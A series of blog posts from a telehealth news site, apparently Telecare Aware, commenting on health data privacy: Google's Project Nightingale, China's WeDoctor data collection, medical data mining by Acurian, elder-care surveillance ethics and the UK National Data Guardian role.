Will the rise of technology mean the fall of privacy–and what can be done? UK seeks a new National Data Guardian.

Can we have data sharing and interoperability while retaining control by individuals on what they want shared? This keeps surfacing as a concern in the US, UK, Europe, and Australia, especially with COVID testing.

In recent news, last week’s acquisition of Ancestry by Blackstone [TTA 13 August] raised questions in minds other than this Editor’s of how a business model based on the value of genomic data to others is going to serve two masters–investors and its customers who simply want to know their genetic profile and disease predispositions, and may not be clear about or confused about how to limit where their data is going, however de-identified. The consolidation of digital health companies, practices, and payers–Teladoc and Livongo, CVS Health and Aetna, and even Village MD and Walgreens–are also dependent on data. Terms you hear are ‘tracking the patient journey’, ‘improving population health’, and a Big ’80s term, ‘synergy’. This does not include all the platforms that are solely about the data and making it more available in the healthcare universe.

A recent HIMSS virtual session, reported in Healthcare Finance, addressed the issue in a soft and jargony way which is easy to dismiss. From one of the five panelists:  

Dr. Alex Cahana, chief medical officer at ConsenSys Health.”And so if we are in essence our data, then any third party that takes that data – with a partial or even complete agreement of consent from my end, and uses it, abuses it or loses it – takes actually a piece of me as a human.”

Dignity-Preserving Technology: Addressing Global Health Disparities in Vulnerable Populations

But then when you dig into it and the further comments, it’s absolutely true. Most data sharing, most of the time, is helpful. Not having to keep track of everything on paper, or being able to store your data digitally, or your primary care practice or radiologist having it and interpretation accessible, makes life easier. The average person tends to block the possibility of misuse, except if it turns around and bites us. So what is the solution? Quite a bit of this discussion was about improving “literacy” which is a Catch-22 of vulnerability– ‘lacking skill and ability’ to understand how their data is being used versus ‘the system’ actually creating these vulnerable populations. But when the priority, from the government on to private payers, is ‘value-based care’ and saving money, how does this prevent ‘nefarious use’ of sharing data and identifying de-identified data for which you, the vulnerable, have given consent, to that end? 

It’s exhausting. Why avoid the problem in the first place? Having observed the uses and misuses of genomics data, this Editor will harp on again that we should have a Genomic Data Bill of Rights [TTA 29 Aug 18] for consumers to be fully transparent on where their data is going, how it is being used, and to easily keep their data private without jumping through a ridiculous number of hoops. This could be expandable to all health data. While I’d prefer this to be enforced by private entities, I don’t see it having a chance. In the US, we have HIPAA which is enforced by HHS’ Office of Civil Rights (OCR), which also watchdogs and fines for internal data breaches. Data privacy is also a problem of international scope, what with data hacking coming from state-sponsored entities in China and North Korea, as well as Eastern European pirates.

Thus it is encouraging that the UK’s Department of Health and Social Care is seeking a new national data guardian (NDG) to figure out how to safeguard patient data, based on the December 2018 Act. This replaces Dame Fiona Caldicott who was the first NDG starting in 2014 well before the Act. The specs for the job in Public Appointments are here. You’ll be paid £45,000 per annum, for a 2-3 day per week, primarily working remote with some travel to Leeds and London. (But if you’d like it, apply quickly–it closes 3 Sept!). It’s not full time, which is slightly dismaying given the situation’s growing importance. The HealthcareITNews article has a HIMSS interview video with Dame Fiona discussing the role of trust in this process starting with the clinician, and why the Care.data program was scrapped. Of related interest is Public Health England’s inter-mortem of lessons learned in data management from COVID-19, while reportedly Secretary Matt Hancock is replacing it with a new agency with a sole focus on health protection from pandemics. Hmmmmm…..HealthcareITNews.

Google’s ‘Project Nightingale’–a de facto breach of 10 million health records, off a bridge too far?

Breaking News. Has this finally blown the lid off Google’s quest for data on everyone? This week’s uncovering, whistleblowing, and general backlash on Google’s agreement with Ascension Health, the largest non-profit health system in the US and the largest Catholic health system on the Planet Earth, revealed by the Wall Street Journal (paywalled) has put a bright light exactly where Google (and Apple, Facebook, and Amazon), do not want it.

Why do these giants want your health data? It’s all about where it can be used and sold. For instance, it can be used in research studies. It can be sold for use in EHR integration. But their services and predictive data is ‘where it’s at’. With enough accumulated data on both your health records and personal life (e.g. not enough exercise, food consumption), their AI and machine learning modeling can predict your health progression (or deterioration), along with probable diagnosis, outcomes, treatment options, and your cost curve. Advertising clicks and merchandising products (baby monitors, PERS, exercise equipment) are only the beginning–health systems and insurers are the main chance. In a worst-case and misuse scenario, the data modeling can make you look like a liability to an employer or an insurer, making you both unemployable and expensively/uninsurable in a private insurance system.

In Google’s latest, their Project Nightingale business associate agreement (BAA) with Ascension Health, permissible under HIPAA, allowed them apparently to access in the initial phase at least 10 million identified health records which were transmitted to Google without patient or physician consent or knowledge, including patient name, lab results, diagnoses, hospital records, patient names and dates of birth. This transfer and the Google agreement were announced by Ascension on 11 November. Ultimately, 50 million records are planned to be transferred from Ascension in 21 states. According to a whistleblower on the project quoted in The Guardian, there are real concerns about individuals handling identified data, the depth of the records, how it’s being handled, and how Google will be using the data. Ascension doesn’t seem to share that concern, stating that their goal is to “optimize the health and wellness of individuals and communities, and deliver a comprehensive portfolio of digital capabilities that enhance the experience of Ascension consumers, patients and clinical providers across the continuum of care” which is a bit of word salad that leads right to Google’s Cloud and G Suite capabilities.

This was enough to kick off an inquiry by Health and Human Services (HHS). A spokesperson confirmed to Healthcare Dive that “HHS’ Office of Civil Rights is opening an investigation into “Project Nightingale.” The agency “would like to learn more information about this mass collection of individuals’ medical records with respect to the implications for patient privacy under HIPAA,” OCR Director Roger Severino said in an emailed statement.”

Project Nightingale cannot help but aggravate existing antitrust concerns by Congress and state attorneys general on these companies and their safeguards on privacy. An example is the pushback around Google’s $2.1 bn acquisition of Fitbit, which one observer dubbed ‘extraordinary’ given Fitbit’s recent business challenges, and data analytics company Looker. DOJ’s antitrust division has been looking into how Google’s personalized advertising transactions work and increasingly there are calls from both ends of the US political spectrum to ‘break them up.’ Yahoo News

Google and Ascension Health may very well be the ‘bridge too far’ that curbs the relentless and largely hidden appetite for personal information by Google, Amazon, Apple, and Facebook that is making their very consumers very, very nervous. Transparency, which seems to be a theme in many of these articles, isn’t a solution. Scrutiny, oversight with teeth, and restrictions are.

Also STAT News , The Verge on Google’s real ambitions in healthcare, and a tart take on Google’s recent lack of success with acquisitions in ZDNet, ‘Why everything Google touches turns to garbage’. Healthcare IT News tries to be reassuring, but the devil may be in Google’s tools not being compliant with HIPAA standards.  Further down in the article, Readers will see that HIPAA states that the agreement covers access to the PHI of the covered entity (Ascension) only to have it carry out its healthcare functions, not for the business associate’s (Google’s) independent use or purposes. 

China’s getting set to be the healthcare AI leader–on the backs of sick, rural citizens’ data privacy

Picture this: a mobile rural health clinic arrives at a rural village in Jia County, in China’s Henan province. The clinic staff check the villagers, many of them elderly and infirm from their hard-working lives. The staff collect vital signs, take blood, urine, ECGs, and other tests. It’s all free, versus going to the hospital 30 miles away.

The catch: the data collected is uploaded to WeDoctor, a private healthcare company specializing in online medical diagnostics and related services that is part of Tencent, the Chinese technology conglomerate which is also devoted to AI. All that data is uploaded to WeDoctor’s AI-powered cloud. The good part: the agreement with the local government that permits this also provides medical services, health insurance, pharmaceuticals and healthcare education to the local people. In addition, it creates a “auxiliary treatment system for general practice” database that Jia County doctors can access for local patients. According to the WIRED article on this, it’s impressive at an IBM Watson level: 

Doctors simply have to input a patient’s symptoms and the system provides them with suggested diagnoses and treatments, calculated from a database of over 5,000 symptoms and 2,000 diseases. WeDoctor claims that the system has an accuracy rate of 90 per cent.

and 

Dr Zhang Qiaofen, in nearby Ren Zhuang village, says the system it has made her life easier. “Since WeDoctor came to my clinic, I feel more comfortable and have more confidence,” she says. “I’m thankful to the device for helping me make decisions.”

The bad part: The patients have no consent or control over the data, nor any privacy restrictions on its use by WeDoctor, Tencent, or the Chinese government. Regional government officials are next pictured in the article reviewing data on Jia County’s citizens: village, gender, age, ailment and whether or not a person has registered with a village health check. Yes, attending these health checks is mandatory for the villagers. 

What is happening is that China is building the world’s largest medical database, free of those pesky Western democracy privacy restrictions, and using AI/machine learning to create a massive set of diagnostic tools. The immediate application is to supplement their paucity of doctors and medical facilities (1.5 doctors per 1,000 people compared to almost double in the UK). All this is being built by an estimated 130 private companies as part of the “Made in China 2025” plan. Long term, the Chinese government gets to know even more intimate details about their 1.3 billion citizens. And these private companies can make money off the data. Such a deal! The difference between China’s attitude towards privacy and Western concerns on same could not be greater.  More on WeDoctor’s ambitions to be the Amazon of healthcare and yes, profit from this data, from Bloomberg. WeDoctor is valued at an incredible $5.5 billion. Hat tip to HISTalk’s Monday morning update.

Creepy data mining on medical conditions runs wild: where’s the privacy?

Ever heard of AcurianHealth? If you are in the US, you may get a letter for one of their research studies or drug trials based upon your prescriptions, your shopping habits, or your internet browsing. Where do they get that data? Quite legitimately, based on consent, Walgreens Boots will mail invitations for studies organized by Acurian to their pharmacy customers, where the user identification is withheld from Acurian. The privacy policy by which Walgreens does business with you permits this type of contact with you. These letters direct users to a generic sounding website for the study–and then life gets interesting. A visit to the site, whether from a letter, a search, or an online ad, may capture your information. There’s a bit of code from a company they work with, NaviStone, that captures information from partial or unsent information requests or signups. NaviStone then matches it up with what you think is anonymous behavior with other databases, and voilá, mail is sent to you via their ‘proprietary technology.’ Acurian uses databases from large data broker/aggregators like Epsilon and cranks away. It’s creepy behavior that stretches the definition of privacy and consent. Not reassuring is that Acurian has a database of over 100 million people who are supposedly opt-ins. How a Company You’ve Never Heard of Sends You Letters about Your Medical Condition (Gizmodo) Hat tip to Toni Bunting

How technology can help fight elder abuse–ethically

The increasing awareness of abuse of older people by their caregivers, whether at home or in care homes/assisted living/nursing homes, invites discussion of the role that technology can play. This presentation by Malcolm J. Fisk, PhD, co-director of the Age Research Centre of Coventry University, in the BSG Ageing Bites series on YouTube looks at technologies viewed by level of control and intrusiveness:

  • Social alarms, which include pull cords (nurse call) and PERS–what we think of as ‘1st generation’ telecare: high level of control, low intrusiveness–but often useless if not reachable in emergency
  • Activity monitoring, which can be room sensor-based or wearable (the 2nd generation): less control, slightly more intrusive–also dependent on monitoring and subject to false positives/negatives
  • Audio and video monitoring, while achieving greater security, are largely uncontrolled by the older person and highly intrusive to the point of unacceptability. (In fact, some feedback on tablet-based telehealth devices indicates that a built-in camera, even if not activated, can be regarded with suspicion and trigger unwanted reactions.)

The issues of consent, and balancing the value of autonomy and privacy versus factors such as cognitive impairment, personal safety and, this Editor would add, detecting attacks by strangers and not caregivers, are explored here. How do we ethically observe yet respect individual privacy? This leads to a set of seven principles Dr Fisk has published on guiding the use of surveillance technologies within care homes in the latest issue of Emerald|Insight (unfortunately abstract access only) Video 11:03Hat tip to Malcolm Fisk via Twitter.

Dr Topol’s prescription for The Future of Medicine, analyzed

The Future of Medicine Is in Your Smartphone sounds like a preface to his latest book, ‘The Patient Will See You Now’, but it is quite consistent with Dr Topol’s talks of late [TTA 5 Dec]. The article is at once optimistic–yes, we love the picture–yet somewhat unreal. When we walk around and kick the tires…

First, it flies in the face of the increasing control of healthcare providers by government as to outcomes and the shift for good or ill to ‘outcomes-based medicine’. Second, ‘doctorless patients’ may need fewer services, not more, and why should these individuals, who represent the high-info elite at least initially, be penalized by having to pay the extremely high premiums dictated by government-approved health insurance (in the US, ACA-compliant insurance a/k/a Obamacare)–or face the US tax penalties for not enrolling in same? Third, those liberating mass market smartwatches and fitness trackers aren’t clinical quality yet–fine directionally, but real clinical diagnosis (more…)

What happens when a medical app…vanishes?

You have just entered The App Twilight Zone…. Our readers know that concussion and diagnosis have been a focus of this Editor’s, and validating apps a focus of Editor Charles’, who brought this to my attention. The app’s name: The Sport Concussion Assessment Tool 2 (SCAT2). The news report states: “It contains all the essentials you would want in a concussion app: a graded symptoms checklist, cognitive testing, balance testing, Glasgow coma scale, Maddocks score, baseline score ability, serial evaluation, and password protected information-sharing via email.”  The plot: it was deactivated without warning or notice by the developer, Inovapp (link to sketchy CrunchBase profile) yet still listed on the iTunes store.

What happened? There was a modified standard (SCAT3) developed in 2012, which updated SCAT2 with non-critical additions: indications for emergency management, a slightly more extensive background section, a neck exam and more detailed return-to-play instructions. SCAT3 is only available on (inconvenient) paper. No word from Inovapp on why it discontinued the app nor any plans for updating.

The SCAT2 had gained, in a short time, a following among coaches and sports medical professionals because it was the first app based upon the international standard (Zurich, 2008, 3rd International Conference on Concussion in Sport) transferring a paper assessment tool to an easy to use app. In fact, the NHL (National Hockey League) has its own version. The revised 2012 standards  Users have a right to be upset, but moreover, this points to a glaring shortcoming of medical apps–their developers vanishing into the night without a by-your-leave. And read the comments by (mainly) doctors on securing patient information after the app is used (HIPAA standards) and one physician’s criticism of apps such as this as a ‘crutch’.  A Pointer to the Future we don’t want to see. The authors Irfan Husain and Iltifat Husain, MD are to be congratulated. Popular app being used to manage concussions fails, failing patients (iMedicalApps)

Eye feels the pain of Google’s Brin and Page

[grow_thumb image=”https://telecareaware.com/wp-content/uploads/2013/02/gimlet-eye.jpg” thumb_width=”150″ /] Oh, the discomfort that Sergey and Larry must be feeling being grilled interviewed by “billionaire venture capitalist Vinod Khosla” (grudgingly respected in TTA 30 May) at one of his eponymous Summits. Here they are with Google Glass in all sorts of adaptations from Parkinson’s to gait improvement to surgery [see multiple TTA articles here], a ‘moonshot on aging and longevity’ dubbed Calico [TTA 19 Sept 13] and even a contact lens to measure blood glucose in tears [TTA 17 Jan]. All good stuff with Big Change potential. Instead they whinge on about how the health field is so regulated, and all the cool stuff you could do with the data but for that privacy thingy (those darn EU, UK regulations and in US, HIPAA). Page to Khosla: “I do worry that we regulate ourselves out of some really great possibilities that are certainly on the data-mining end.” Brin to Khosla: “Generally, health is just so heavily regulated. It’s just a painful business to be in. It’s just not necessarily how I want to spend my time.” Gee. Whiz. What is apparent here is a lack of personal respect for us ‘little folks’ privacy and our everyday, humdrum lives.

Advice straight from The Gimlet Eye: My dear boys, you’ll just have to get people’s data with that old-fashioned thing, permission. (And you’d be surprised that many would be happy to give it to you.) Or if it’s all too painful, Sergey can play with his superyacht, latest girlfriend and follow his estranged wife Anne Wojcicki’s 23andme‘s ongoing dealings with the FDA. At least she’s in the arena. Google leaders think health is ‘a painful business to be in’ (SFGate) Mobihealthnews covers their true confessions, with an interesting veer off in the final third of the article to Mr Khosla’s view of Ginger.io’s surprising pilot with Kaiser and then to WellDoc’s Bluestar diabetes therapy app–the only one that is 510(k)Class II and registered as a pharmaceutical product [TTA 10 Jan].  Also interesting re the Googlers’ mindset is a SFGate blog piece on Larry Page’s attitudes towards leisure and work in a Keynes-redux ‘vision of the future‘. < work + > people may= >leisure, but certainly<<<$£€¥ for even the well-educated and managerial!

Are mHealth apps sharing your data with pharma and insurance companies?

As a further postscript to our recent post on mHealth apps, the Financial Times has just published an article offering a worrying new angle. According to the FT, the “top 20” health & wellness apps are sharing data on you with third parties that, the FT reckons, may include pharmaceutical and insurance companies.

They report that: “Regulations bar the tracking and selling of individuals’ specific medical and  prescription records. Yet some companies are figuring out ways around those  restrictions by building digital health profiles about people based on their use  of the web and mobile apps.”

Perhaps a case of reading those Ts & Cs carefully before pressing ‘accept’?

The amazing lightness of Google’s Being There vs The Private Eye

[grow_thumb image=”https://telecareaware.com/wp-content/uploads/2013/02/gimlet-eye.jpg” thumb_width=”150″ /]Perhaps it is The Google Gimlet Eye’s peevishness at this late hour, but mentioning this company in conjunction with ‘privacy’ lately makes the Eye Goggle. First there is the sheer howling irony of chairman Eric Schmidt’s interesting definition of the Digital Dark Side in this past weekend’s Wall Street Journal, a state of data mining and real-time behavioral monitoring that applies to totalitarian regimes like North Korea, Iran or (more…)